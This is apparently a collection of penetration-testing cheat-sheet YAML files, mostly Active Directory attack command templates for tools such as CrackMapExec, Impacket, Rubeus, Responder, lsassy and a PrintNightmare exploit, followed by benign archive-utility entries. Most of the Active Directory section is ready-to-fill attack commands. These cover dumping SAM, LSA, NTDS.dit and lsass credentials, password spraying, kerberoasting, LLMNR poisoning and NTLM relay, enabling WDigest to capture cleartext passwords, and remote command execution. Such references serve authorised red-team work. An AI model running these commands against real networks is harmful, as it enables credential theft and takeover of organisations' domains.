/files/Active_directory/Impacket/impacket-smb_msrpc.yaml: -------------------------------------------------------------------------------- 1 | name: impacket 2 | tags: [smbclient- connect to smb on the target] 3 | data: | 4 | plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/CONNECT 5 | 6 | A generic SMB client that will let you list shares and files, rename, upload and download files and create and delete directories, all using either username and password or username and hashes combination. 7 | 8 | -hashes : 9 | -no-pass -k : kerberos authentication 10 | 11 | ``` 12 | smbclient.py /:@ 13 | ``` 14 | 15 | -------------------------------------------------------------------------------- /files/Active_directory/Impacket/impacket.yaml: -------------------------------------------------------------------------------- 1 | name: Impacket 2 | tags: [impacket, windows, smb, 445] 3 | data: | 4 | 5 | lookupsid - SID User Enumeration, extract the information about what users exist and their data. 6 | plateform/linux #target/remote #cat/RECON 7 | 8 | ``` 9 | lookupsid.py /:@ 10 | ``` 11 | 12 | reg - query registry info remotely 13 | plateform/linux #target/remote #cat/RECON 14 | ``` 15 | reg.py /:@ query -keyName HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows -s 16 | ``` 17 | 18 | rpcdump - list rpc endpoint 19 | plateform/linux #target/remote #cat/RECON 20 | ``` 21 | rpcdump.py /:@ 22 | ``` 23 | 24 | services.py - (start, stop, delete, read status, config, list, create and change any service) remote 25 | plateform/linux #target/remote #cat/RECON #cat/ATTACK/EXPLOIT 26 | ``` 27 | services.py /:@ 28 | ``` 29 | 30 | getarch - find target architecture (64 or 32 bits) 31 | plateform/linux #target/remote #cat/RECON 32 | ``` 33 | getArch.py -target 34 | ``` 35 | 36 | netview - enumeration tool (ip/shares/sessions/logged users) - need dns set 37 | plateform/linux #target/remote #cat/RECON 38 | ``` 39 | netview.py / -target -users 40 | ``` 41 | 42 | 43 | -------------------------------------------------------------------------------- /files/Active_directory/bloodhound.yaml: -------------------------------------------------------------------------------- 1 | name: bloodhound 2 | tags: [bloodhound, Active directory enumeration] 3 | data: | 4 | 5 | start neo4j server 6 | plateform/linux #target/serve #cat/UTILS 7 | https://neo4j.com/docs/ 8 | 9 | ```bash 10 | neo4j console start 11 | ``` 12 | 13 | bloodhound start IHM 14 | plateform/linux #target/local #cat/RECON 15 | https://github.com/BloodHoundAD/BloodHound 16 | 17 | ```bash 18 | bloodhound 19 | ``` 20 | 21 | bloodhound - collect data 22 | plateform/linux #target/remote #port/389 #port/631 #cat/RECON 23 | https://github.com/fox-it/BloodHound.py 24 | 25 | ```bash 26 | bloodhound-python -d -u -p -c all 27 | ``` 28 | 29 | bloodhound - collect data (alternative) 30 | plateform/linux #target/remote #port/389 #port/631 #cat/RECON 31 | https://github.com/fox-it/BloodHound.py 32 | 33 | ```bash 34 | bloodhound-python -d -u -p -gc -dc -c all 35 | ``` 36 | 37 | sharphound - collect bloodhound data 38 | plateform/windows #target/remote #port/389 #port/631 #cat/RECON 39 | https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors 40 | 41 | ```powershell 42 | import-module sharphound.ps1 43 | invoke-bloodhound -collectionmethod all -domain 44 | ``` 45 | 46 | cypheroth - start 47 | plateform/linux #target/local #cat/RECON 48 | Toolset that runs cypher queries against Bloodhound's Neo4j backend and saves output to spreadsheets. 49 | 50 | https://github.com/seajaysec/cypheroth 51 | 52 | ```bash 53 | cypheroth -u -p -d 54 | ``` 55 | 56 | aclpwn - from computer to domain - dry run 57 | plateform/linux #target/local #cat/RECON 58 | Aclpwn.py is a tool that interacts with BloodHound to identify and exploit ACL based privilege escalation paths. 59 | 60 | https://github.com/fox-it/aclpwn.py 61 | 62 | ``` 63 | aclpwn -f -ft computer -d -dry 64 | ``` 65 | 66 | 67 | 68 | -------------------------------------------------------------------------------- /files/Active_directory/cme.yaml: -------------------------------------------------------------------------------- 1 | name: cme 2 | tags: [cme, crackmapexec, windows, Active directory] 3 | data: | 4 | 5 | cme - enumerate hosts, network 6 | plateform/linux #target/remote #port/445 #protocol/smb #cat/RECON 7 | Exemple : cme smb 192.168.1.0/24 8 | 9 | https://mpgn.gitbook.io/crackmapexec/ 10 | 11 | ```bash 12 | cme smb 13 | ``` 14 | 15 | cme - enumerate password policy 16 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/RECON 17 | 18 | ```bash 19 | cme smb -u -p '' --pass-pol 20 | ``` 21 | 22 | cme - enumerate null session 23 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/ATTACK/CONNECT 24 | 25 | ```bash 26 | cme smb -u '' -p '' 27 | ``` 28 | 29 | cme - enumerate anonymous login 30 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/ATTACK/CONNECT 31 | 32 | ```bash 33 | cme smb -u 'a' -p '' 34 | ``` 35 | 36 | cme - enumerate active sessions 37 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/RECON 38 | 39 | ```bash 40 | cme smb -u -p '' --sessions 41 | ``` 42 | 43 | cme - enumerate domain users 44 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/RECON 45 | 46 | ```bash 47 | cme smb -u -p '' --users 48 | ``` 49 | 50 | cme - enumerate users by bruteforce the RID 51 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/RECON 52 | 53 | ```bash 54 | cme smb -u -p '' --rid-brute 55 | ``` 56 | 57 | cme - enumerate domain groups 58 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/RECON 59 | 60 | ```bash 61 | cme smb -u -p '' --groups 62 | ``` 63 | 64 | cme - enumerate local groups 65 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/RECON 66 | 67 | ```bash 68 | cme smb -u -p '' --local-groups 69 | ``` 70 | 71 | cme - enumerate shares 72 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/RECON 73 | 74 | Enumerate permissions on all shares 75 | 76 | ```bash 77 | cme smb -u -p -d --shares 78 | ``` 79 | 80 | cme - enumerate disks 81 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/RECON 82 | 83 | Enumerate disks on the remote target 84 | 85 | ```bash 86 | cme smb -u -p '' --disks 87 | ``` 88 | 89 | cme - enumerate smb target not signed 90 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/RECON 91 | 92 | Maps the network of live hosts and saves a list of only the hosts that don't require SMB signing. List format is one IP per line 93 | 94 | ```bash 95 | cme smb --gen-relay-list smb_targets.txt 96 | ``` 97 | 98 | cme - enumerate logged users 99 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/RECON 100 | 101 | ```bash 102 | cme smb -u -p '' --loggedon-users 103 | ``` 104 | 105 | cme - enable wdigest 106 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/POSTEXPLOIT #warning/modify_target 107 | 108 | enable/disable the WDigest provider and dump clear-text credentials from LSA memory. 109 | 110 | ```bash 111 | cme smb -u -p '' --local-auth --wdigest enable 112 | ``` 113 | 114 | cme - loggout user 115 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #warning/modify_target #cat/POSTEXPLOIT 116 | 117 | Can be usefull after enable wdigest to force user to reconnect 118 | 119 | ```bash 120 | cme smb -u -p '' -x 'quser' 121 | cme smb -u -p '' -x 'logoff ' --no-output 122 | ``` 123 | 124 | cme - local-auth 125 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/ATTACK/CONNECT 126 | 127 | ```bash 128 | cme smb -u -p --local-auth 129 | ``` 130 | 131 | cme - local-auth with hash 132 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/ATTACK/CONNECT 133 | 134 | ```bash 135 | cme smb -u -H --local-auth 136 | ``` 137 | 138 | cme - domain auth 139 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/ATTACK/CONNECT 140 | 141 | ```bash 142 | cme smb -u -p -d 143 | ``` 144 | 145 | cme - kerberos auth 146 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/ATTACK/CONNECT 147 | 148 | Previously import ticket : 149 | export KRB5CCNAME=/tmp/ticket.ccache 150 | 151 | ```bash 152 | cme smb --kerberos 153 | ``` 154 | 155 | cme - Dump SAM 156 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/POSTEXPLOIT/CREDS_RECOVER 157 | 158 | Dump SAM hashes using methods from secretsdump.py 159 | You need at least local admin privilege on the remote target, use option --local-auth if your user is a local account 160 | 161 | ```bash 162 | cme smb -u -p -d --sam 163 | ``` 164 | 165 | cme - Dump LSA 166 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/POSTEXPLOIT/CREDS_RECOVER 167 | 168 | Dump LSA secrets using methods from secretsdump.py 169 | Requires Domain Admin or Local Admin Priviledges on target Domain Controller 170 | 171 | ```bash 172 | cme smb -u -p -d --lsa 173 | ``` 174 | 175 | cme - dump ntds.dit 176 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/POSTEXPLOIT/CREDS_RECOVER 177 | 178 | Dump the NTDS.dit from target DC using methods from secretsdump.py 179 | Requires Domain Admin or Local Admin Priviledges on target Domain Controller 180 | 181 | ```bash 182 | cme smb -u -p -d --ntds 183 | ``` 184 | 185 | cme - dump lsass 186 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/POSTEXPLOIT/CREDS_RECOVER 187 | 188 | ```bash 189 | cme smb -u -p -d -M lsassy 190 | ``` 191 | 192 | cme - dump lsass - with bloodhond update 193 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/POSTEXPLOIT/CREDS_RECOVER 194 | 195 | ```bash 196 | cme smb --local-auth -u -H -M lsassy -o BLOODHOUND=True NEO4JUSER= NEO4JPASS= 197 | ``` 198 | 199 | cme - password spray (user=password) 200 | plateform/linux #target/remote #port/445 #port/139 #protocol/smb #cat/ATTACK/BRUTEFORCE-SPRAY 201 | 202 | ```bash 203 | cme smb -u -p --no-bruteforce --continue-on-success 204 | ``` 205 | 206 | cme - password spray multiple test 207 | plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/BRUTEFORCE-SPRAY #tag/warning 208 | 209 | (carrefull on lockout) 210 | 211 | ```bash 212 | cme smb -u -p --continue-on-success 213 | ``` 214 | 215 | cme - put file 216 | plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/FILE_TRANSFERT 217 | Send a local file to the remote target 218 | 219 | ```bash 220 | cme smb -u -p --put-file 221 | ``` 222 | 223 | cme - get file 224 | plateform/linux #target/remote #port/445 #protocol/smb #cat/ATTACK/FILE_TRANSFERT 225 | Send a local file to the remote target 226 | 227 | ```bash 228 | cme smb -u -p --get-file 229 | ``` 230 | 231 | cme - ASREPRoast enum without authentication 232 | plateform/linux #target/remote #port/389 #port/639 #protocol/ldap #cat/RECON 233 | 234 | User can be a wordlist too (user.txt) 235 | Hashcat format -m 18200 236 | 237 | ```bash 238 | cme ldap -u -p '' --asreproast ASREProastables.txt --kdcHost 239 | ``` 240 | 241 | cme - ASREPRoast enum with authentication 242 | plateform/linux #target/remote #port/389 #port/639 #protocol/ldap #cat/RECON 243 | 244 | Hashcat format -m 18200 245 | 246 | ```bash 247 | cme ldap -u -p '' --asreproast ASREProastables.txt --kdcHost 248 | ``` 249 | 250 | cme - Kerberoasting 251 | plateform/linux #target/remote #port/389 #port/639 #protocol/ldap #cat/RECON 252 | 253 | Hashcat format -m 13100 254 | 255 | ```bash 256 | cme ldap -u -p '' --kerberoasting kerberoastables.txt --kdcHost 257 | ``` 258 | 259 | cme - Unconstrained delegation 260 | plateform/linux #target/remote #port/389 #port/639 #protocol/ldap #cat/RECON 261 | 262 | List of all computers et users with the flag TRUSTED_FOR_DELEGATION 263 | 264 | ```bash 265 | cme ldap -u -p '' --trusted-for-delegation 266 | ``` 267 | 268 | cme - winrm-auth 269 | plateform/linux #target/remote #port/5985 #port/5986 #protocol/winrm #cat/ATTACK/CONNECT 270 | 271 | ```bash 272 | cme winrm -u -p 273 | ``` 274 | 275 | cme - mssql password spray 276 | plateform/linux #target/remote #port/1433 #protocol/mssql #cat/ATTACK/BRUTEFORCE-SPRAY 277 | 278 | ```bash 279 | cme mssql -u -p --no-bruteforce 280 | ``` 281 | 282 | cme - mssql execute query 283 | plateform/linux #target/remote #port/1433 #protocol/mssql #cat/ATTACK/EXPLOIT 284 | 285 | ```bash 286 | cme mssql -u -p '' --local-auth -q 'SELECT name FROM master.dbo.sysdatabases;' 287 | ``` 288 | 289 | cme - mssql execute command 290 | plateform/linux #target/remote #port/1433 #protocol/mssql #cat/ATTACK/EXPLOIT 291 | 292 | ```bash 293 | cme mssql -u -p '' --local-auth -x 294 | ``` 295 | 296 | = ip: 192.168.1.0/24 297 | -------------------------------------------------------------------------------- /files/Active_directory/kerberos.yaml: -------------------------------------------------------------------------------- 1 | name: kerberos 2 | tags: [kerberos] 3 | data: | 4 | 5 | Kerbrute usersenum 6 | plateform/linux #target/remote #port/88 #protocol/kerberos #cat/ATTACK/BRUTEFORCE-SPRAY 7 | ``` 8 | ./kerbrute_linux_amd64 userenum -d --dc 9 | ``` 10 | 11 | kerberos enum users 12 | plateform/linux #target/remote #port/88 #protocol/kerberos #cat/RECON 13 | ``` 14 | nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm=''" 15 | ``` 16 | 17 | kerberos enum users (with user list) 18 | plateform/linux #target/remote #port/88 #protocol/kerberos #cat/ATTACK/BRUTEFORCE-SPRAY 19 | ``` 20 | nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='',userdb=" 21 | ``` 22 | 23 | kerberos ms14-068 24 | plateform/linux #target/remote #port/88 #protocol/kerberos #cat/ATTACK/EXPLOIT 25 | ``` 26 | msfconsole -x "use auxiliary/admin/kerberos/ms14_068_kerberos_checksum" 27 | ``` 28 | 29 | exploit gpp - group policy preference (ms14-025) 30 | plateform/linux #target/remote #port/88 #protocol/kerberos #cat/RECON 31 | ``` 32 | msfconsole -x "use scanner/smb/smb_enum_gpp" 33 | ``` 34 | -------------------------------------------------------------------------------- /files/Active_directory/laps.yaml: -------------------------------------------------------------------------------- 1 | name: LAPS 2 | tags: [laps, password] 3 | data: | 4 | 5 | get laps passwords 6 | plateform/linux #target/remote #cat/POSTEXPLOIT/CREDS_RECOVER 7 | ``` 8 | Get-LAPSPasswords -DomainController -Credential \ | Format-Table -AutoSize 9 | ``` 10 | 11 | get all machine passwords 12 | plateform/linux #target/remote #cat/POSTEXPLOIT/CREDS_RECOVER 13 | ``` 14 | foreach ($objResult in $colResults){$objComputer = $objResult.Properties; $objComputer.name|where {$objcomputer.name -ne $env:computername}|%{foreach-object {Get-AdmPwdPassword -ComputerName $_}}} 15 | ``` 16 | -------------------------------------------------------------------------------- /files/Active_directory/lsassy.yaml: -------------------------------------------------------------------------------- 1 | name: Lsassy 2 | tags: [Lsassybasic usage with password (ip or range)] 3 | data: | 4 | plateform/linux #target/remote #cat/POSTEXPLOIT/CREDS_RECOVER 5 | ``` 6 | lsassy -d -u -p 7 | ``` 8 | 9 | Lsassy basic usage with hash (ip or range) 10 | plateform/linux #target/remote #cat/POSTEXPLOIT/CREDS_RECOVER 11 | ``` 12 | lsassy -v -u -H 13 | ``` 14 | 15 | Lsassy basic usage with kerberos (ip or range) 16 | plateform/linux #target/remote #cat/POSTEXPLOIT/CREDS_RECOVER 17 | ``` 18 | lsassy -d -u -k 19 | ``` 20 | -------------------------------------------------------------------------------- /files/Active_directory/mitm6.yaml: -------------------------------------------------------------------------------- 1 | name: mitm6 2 | tags: [mitm6, ipv6, man in the middle] 3 | data: | 4 | 5 | run mitm6 (to run with impacket-ntlmrelayx) 6 | plateform/linux #target/remote #cat/ATTACK/MITM 7 | ``` 8 | mitm6 -d 9 | ``` 10 | -------------------------------------------------------------------------------- /files/Active_directory/responder.yaml: -------------------------------------------------------------------------------- 1 | name: responder 2 | tags: [responder, LLMNR, NBT-NS, Poisoning, man in the middle] 3 | data: | 4 | 5 | responder launch 6 | plateform/linux #target/remote #cat/ATTACK/MITM 7 | ``` 8 | responder –I eth0 9 | ``` 10 | 11 | responder launch - analyze mode (no poisoning) 12 | plateform/linux #target/remote #cat/RECON 13 | ``` 14 | responder –I eth0 -A 15 | ``` 16 | 17 | responder launch with wpad file 18 | plateform/linux #target/remote #cat/ATTACK/MITM 19 | ``` 20 | responder -I eth0 --wpad 21 | ``` 22 | 23 | responder http on 24 | plateform/linux #target/local #cat/UTILS 25 | ``` 26 | sed -i 's/HTTP = Off/HTTP = On/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'HTTP =' 27 | ``` 28 | 29 | responder http off 30 | plateform/linux #target/local #cat/UTILS 31 | ``` 32 | sed -i 's/HTTP = On/HTTP = Off/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'HTTP =' 33 | ``` 34 | 35 | responder smb on 36 | plateform/linux #target/local #cat/UTILS 37 | ``` 38 | sed -i 's/SMB = Off/SMB = On/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'SMB =' 39 | ``` 40 | 41 | responder smb off 42 | plateform/linux #target/local #cat/UTILS 43 | ``` 44 | sed -i 's/SMB = On/SMB = Off/g' /opt/tools/Responder/Responder.conf && cat /opt/tools/Responder/Responder.conf | grep --color=never 'SMB =' 45 | ``` 46 | 47 | multirelay attack - user filtered (previous disable HTTP and SMB in Responder.conf) 48 | plateform/linux #target/serve #cat/ATTACK/MITM 49 | ``` 50 | multirelay -t -u 51 | ``` 52 | 53 | multirelay attack - all user (previous disable HTTP and SMB in Responder.conf) 54 | plateform/linux #target/serve #cat/ATTACK/MITM 55 | ``` 56 | multirelay -t -u ALL 57 | ``` 58 | 59 | runfinger - Responder-related utility which will finger a single IP address or an IP subnet and will reveal if a target requires SMB Signing or not. 60 | plateform/linux #target/remote #cat/RECON 61 | ``` 62 | runfinger -i 63 | ``` 64 | -------------------------------------------------------------------------------- /files/Active_directory/rpcclient.yaml: -------------------------------------------------------------------------------- 1 | name: rpcclient 2 | tags: [rpcclient, rpc, windows] 3 | data: | 4 | 5 | rpcclient - enumdomusers 6 | plateform/linux #target/remote #cat/RECON 7 | ``` 8 | rpcclient -U "%" -c "enumdomusers;quit" 9 | ``` 10 | 11 | rpcclient - srvinfo 12 | plateform/linux #target/remote #cat/RECON 13 | ``` 14 | rpcclient -U "%" -c "srvinfo;quit" 15 | ``` 16 | 17 | rpcclient - get user sid 18 | plateform/linux #target/remote #cat/RECON 19 | ``` 20 | rpcclient -c "lookupnales ; wmic useraccount get name,sid; quit" 21 | ``` 22 | 23 | rpcclient - querydominfo 24 | plateform/linux #target/remote #cat/RECON 25 | ``` 26 | rpcclient -U "%" -c "querydominfo;quit" 27 | ``` 28 | 29 | rpcclient - getdompwinfo (password policy) 30 | plateform/linux #target/remote #cat/RECON 31 | ``` 32 | rpcclient -U "%" -c "getdompwinfo;quit" 33 | ``` 34 | 35 | rpcclient - netshareenum (password policy) 36 | plateform/linux #target/remote #cat/RECON 37 | ``` 38 | rpcclient -U "%" -c "netshareenum;quit" 39 | ``` 40 | 41 | Trying all username as password from list of users 42 | plateform/linux #target/remote #cat/ATTACK/BRUTEFORCE-SPRAY 43 | ``` 44 | for u in `cat `; do echo -n "user: $u " && rpcclient -U "$u%$u" -c "getusername;quit" ; done 45 | ``` 46 | 47 | rpcclient - enum (Enum commands list) 48 | plateform/linux #target/remote #cat/RECON 49 | ``` 50 | rpcclient -U "%" -c "enum;quit" 51 | ``` 52 | 53 | rpcclient - enumdomains (Current domain) 54 | plateform/linux #target/remote #cat/RECON 55 | ``` 56 | rpcclient -U "%" -c "enumdomains;quit" 57 | ``` 58 | 59 | rpcclient - enumdomgroups (Enum Domain groups) 60 | plateform/linux #target/remote #cat/RECON 61 | ``` 62 | rpcclient -U "%" -c "enumdomgroups;quit" 63 | ``` 64 | 65 | rpcclient - querygroup (Enum Group Information) 66 | plateform/linux #target/remote #cat/RECON 67 | ``` 68 | rpcclient -U "%" -c "querygroup ;quit" 69 | ``` 70 | 71 | rpcclient - querygroupmem (Enum Group Membership) 72 | plateform/linux #target/remote #cat/RECON 73 | ``` 74 | rpcclient -U "%" -c "querygroupmem ;quit" 75 | ``` 76 | 77 | rpcclient - queryuser (Enumerate specific User/ computer information by RID) 78 | plateform/linux #target/remote #cat/RECON 79 | ``` 80 | rpcclient -U "%" -c "queryuser ;quit" 81 | ``` 82 | 83 | rpcclient - getusrdompwinfo (User password policies) 84 | plateform/linux #target/remote #cat/RECON 85 | ``` 86 | rpcclient -U "%" -c "getusrdompwinfo ;quit" 87 | ``` 88 | 89 | rpcclient - lsaenumsid (Local Users LSA Enum SID) 90 | plateform/linux #target/remote #cat/RECON 91 | ``` 92 | rpcclient -U "%" -c "lsaenumsid;quit" 93 | ``` 94 | 95 | rpcclient - lookupsid (Local Users Lookup SID) 96 | plateform/linux #target/remote #cat/RECON 97 | ``` 98 | rpcclient -U "%" -c "lookupsid ;quit" 99 | ``` 100 | 101 | rpcclient - setuserinfo2 (Reset AD user password) 102 | plateform/linux #target/remote #cat/EXPLOIT 103 | ``` 104 | rpcclient -U "%" -c "setuserinfo2 23 '';quit" 105 | ``` 106 | 107 | -------------------------------------------------------------------------------- /files/Active_directory/rubeus.yaml: -------------------------------------------------------------------------------- 1 | name: rubeus 2 | tags: [ad, windows, rubeus] 3 | data: | 4 | 5 | # inject ticket from file 6 | plateform/windows #target/local #cat/UTILS 7 | ```cmd 8 | .\Rubeus.exe ptt /ticket: 9 | ``` 10 | 11 | inject ticket from b64 blob 12 | plateform/windows #target/local #cat/UTILS 13 | ```cmd 14 | .\Rubeus.exe ptt /ticket: 15 | ``` 16 | 17 | # check ASPREPRoast for all users in current domain 18 | plateform/windows #target/remote #cat/ATTACK/EXPLOIT 19 | ```cmd 20 | .\Rubeus.exe asreproast /format: /outfile: 21 | ``` 22 | 23 | ASREPRoast specific user 24 | plateform/windows #target/remote #cat/ATTACK/EXPLOIT 25 | ```cmd 26 | .\Rubeus.exe asreproast /user: /domain: /format: /outfile: 27 | ``` 28 | 29 | # kerberoasting - current domain 30 | plateform/windows #target/remote #cat/ATTACK/EXPLOIT 31 | ```cmd 32 | .\Rubeus.exe kerberoast /outfile: 33 | ``` 34 | 35 | Kerberoasting and outputing on a file with a spesific format 36 | plateform/windows #target/remote #cat/ATTACK/EXPLOIT 37 | ```cmd 38 | .\Rubeus.exe kerberoast /outfile: /domain: 39 | ``` 40 | 41 | Kerberoasting whle being "OPSEC" safe, essentially while not try to roast AES enabled accounts 42 | plateform/windows #target/remote #cat/ATTACK/EXPLOIT 43 | ```cmd 44 | .\Rubeus.exe kerberoast /outfile: /domain: /rc4opsec 45 | ``` 46 | 47 | Kerberoast AES enabled accounts 48 | plateform/windows #target/remote #cat/ATTACK/EXPLOIT 49 | ```cmd 50 | .\Rubeus.exe kerberoast /outfile: /domain: /aes 51 | ``` 52 | 53 | Kerberoast specific user account 54 | plateform/windows #target/remote #cat/ATTACK/EXPLOIT 55 | ```cmd 56 | .\Rubeus.exe kerberoast /outfile: /domain: /user: /simple 57 | ``` 58 | 59 | get hash 60 | plateform/windows #target/remote #cat/POSTEXPLOIT/CREDS_RECOVER 61 | ```cmd 62 | .\Rubeus.exe hash /user: /domain: /password: 63 | ``` 64 | 65 | dump - will dump any relevant cached TGS ticket’s stored 66 | plateform/windows #target/local #cat/POSTEXPLOIT/CREDS_RECOVER 67 | ``` 68 | .\Rubeus.exe dump 69 | ``` 70 | 71 | ask and inject ticket 72 | plateform/windows #target/remote #cat/ATTACK/CONNECT 73 | ``` 74 | .\Rubeus.exe asktgt /user: /domain: /rc4: /ptt 75 | ``` 76 | 77 | S4U - with ticket - Contrained delegation 78 | plateform/windows #target/remote #cat/ATTACK/EXPLOIT 79 | ``` 80 | .\Rubeus.exe s4u /ticket: /impersonateuser: /msdsspn:ldap/ /altservice:cifs /ptt 81 | ``` 82 | 83 | S4U - with hash - Constrained delegation 84 | plateform/windows #target/remote #cat/ATTACK/EXPLOIT 85 | ``` 86 | .\Rubeus.exe s4u /user: /rc4: /impersonateuser: /msdsspn:ldap/ /altservice:cifs /domain: /ptt 87 | ``` 88 | 89 | get rc4 of machine with the password 90 | plateform/windows #target/local #cat/POSTEXPLOIT/CREDS_RECOVER 91 | ``` 92 | .\Rubeus.exe hash /password: 93 | ``` 94 | 95 | S4U - Resource based contrained delegation 96 | plateform/windows #target/remote #cat/ATTACK/EXPLOIT 97 | ``` 98 | .\Rubeus.exe s4u /user: /rc4: /impersonateuser: /msdsspn:cifs/ /domain: /ptt 99 | ``` 100 | 101 | = ticket : c:\Temp\ticket.kirbi 102 | = domain_fqdn : MYDC.mydomain.local 103 | = domain_name : mydomain.local 104 | = AS_REP_response_format : hashcat 105 | -------------------------------------------------------------------------------- /files/Active_directory/spooler_service_abuse.yaml: -------------------------------------------------------------------------------- 1 | name: Printerbug 2 | tags: [printerbug, Active directory] 3 | data: | 4 | 5 | Finding Spooler services listening 6 | plateform/linux #target/remote #cat/RECON 7 | ``` 8 | rpcdump.py /:''@ | grep MS-RPRN 9 | ``` 10 | 11 | Finding Spooler services anonymous 12 | plateform/linux #target/remote #cat/RECON 13 | ``` 14 | rpcdump.py | grep -A 6 MS-RPRN 15 | ``` 16 | 17 | dementor 18 | plateform/linux #target/remote #cat/ATTACK/EXPLOIT 19 | https://github.com/NotMedic/NetNTLMtoSilverTicket 20 | 21 | ``` 22 | dementor.py -d -u -p 23 | ``` 24 | 25 | printerbug 26 | plateform/linux #target/remote #cat/ATTACK/EXPLOIT 27 | https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py 28 | 29 | ``` 30 | printerbug.py '/:'@ 31 | ``` 32 | 33 | ntlmrelayx add computer 34 | plateform/linux #target/remote #cat/ATTACK/MITM 35 | ``` 36 | ntlmrelayx -t ldaps:// -smb2support --remove-mic --add-computer --delegate-access 37 | ``` 38 | 39 | use silver ticket 40 | plateform/linux #target/remote #cat/ATTACK/EXPLOIT 41 | ``` 42 | getST.py -spn host/ -impersonate -dc-ip '/$:' 43 | ``` 44 | 45 | secret dump with kerberos 46 | plateform/linux #target/remote #cat/POSTEXPLOIT/CREDS_RECOVER 47 | ``` 48 | secretsdump -k 49 | ``` 50 | 51 | PrintNightmare 52 | plateform/linux #target/remote #cat/ATTACK/EXPLOIT 53 | https://github.com/cube0x0/CVE-2021-1675 54 | 55 | - windows server 2019 56 | container_info['DriverInfo']['Level2']['pDriverPath'] = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL\x00" 57 | - windows server 2016 58 | container_info['DriverInfo']['Level2']['pDriverPath'] = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_db4f0d0030e708f4\\Amd64\\UNIDRV.DLL\x00" 59 | 60 | Need a real smb server (not work with the impacket server) 61 | 62 | ``` 63 | CVE-2021-1675.py /:@ '\\\\.dll' 64 | ``` 65 | 66 | 67 | 68 | = user : anonymous 69 | = pass : anonymous 70 | = computer_name : arsenal 71 | = dc : DC01.domain.local 72 | = dc1 : DC01.domain.local 73 | = dc2 : DC02.domain.local 74 | = computer_password : 123soleil 75 | 76 | -------------------------------------------------------------------------------- /files/Archive/7z.yaml: -------------------------------------------------------------------------------- 1 | name: 7z 2 | tags: [archive] 3 | data: | 4 | 5 | plateform/linux #target/local #cat/UTILS 6 | 7 | 7z create archive with password 8 | ``` 9 | 7z a .7z -p 10 | ``` 11 | -------------------------------------------------------------------------------- /files/Archive/gzip.yaml: -------------------------------------------------------------------------------- 1 | name: gzip 2 | tags: [archive] 3 | data: | 4 | plateform/linux #target/local #cat/UTILS 5 | 6 | Compress file and appends .gz to its name 7 | ``` 8 | gzip 9 | ``` 10 | 11 | Decompress compressed file 12 | ``` 13 | gzip -d 14 | ``` 15 | -------------------------------------------------------------------------------- /files/Archive/rar.yaml: -------------------------------------------------------------------------------- 1 | name: rar 2 | tags: [archive] 3 | data: | 4 | plateform/linux #target/local #cat/UTILS 5 | 6 | Compress dir to rar file 7 | ``` 8 | rar a 9 | ``` 10 | 11 | Decompress rar file 12 | ``` 13 | unrar x .rar 14 | ``` 15 | -------------------------------------------------------------------------------- /files/Archive/tar.yaml: -------------------------------------------------------------------------------- 1 | name: tar 2 | tags: [archive] 3 | data: | 4 | 5 | plateform/linux #target/local #cat/UTILS 6 | 7 | Create a tar containing files 8 | ``` 9 | tar cf .tar 10 | ``` 11 | 12 | Extract the files from a tar 13 | ``` 14 | tar xf 15 | ``` 16 | 17 | Create a tar with Gzip compression 18 | ``` 19 | tar czf .tar.gz 20 | ``` 21 | 22 | Extract a tar using Gzip 23 | ``` 24 | tar xzf 25 | ``` 26 | -------------------------------------------------------------------------------- /files/Archive/zip.yaml: -------------------------------------------------------------------------------- 1 | name: zip 2 | tags: [archive, compress] 3 | data: | 4 | 5 | plateform/linux #target/local #cat/UTILS 6 | 7 | create zip file 8 | ``` 9 | zip .zip 10 | ``` 11 | 12 | zip all the files of current directory 13 | ``` 14 | zip .zip * 15 | ``` 16 | 17 | zip folder 18 | ``` 19 | zip -r .zip 20 | ``` 21 | 22 | add file to a zip archive 23 | ``` 24 | zip -u .zip 25 | ``` 26 | 27 | view zip content 28 | ``` 29 | zipinfo .zip 30 | ``` 31 | 32 | create zip file with symlink (usefull for path traversal) 33 | ``` 34 | zip --symlinks .zip 35 | ``` 36 | 37 | list detailed zip file content 38 | ``` 39 | unzip -Z .zip 40 | ``` 41 | 42 | unzip file 43 | ``` 44 | unzip .zip 45 | ``` 46 | 47 | unzip file to directory 48 | ``` 49 | unzip .zip -d 50 | ``` 51 | -------------------------------------------------------------------------------- /files/BruteForce/hydra.yaml: 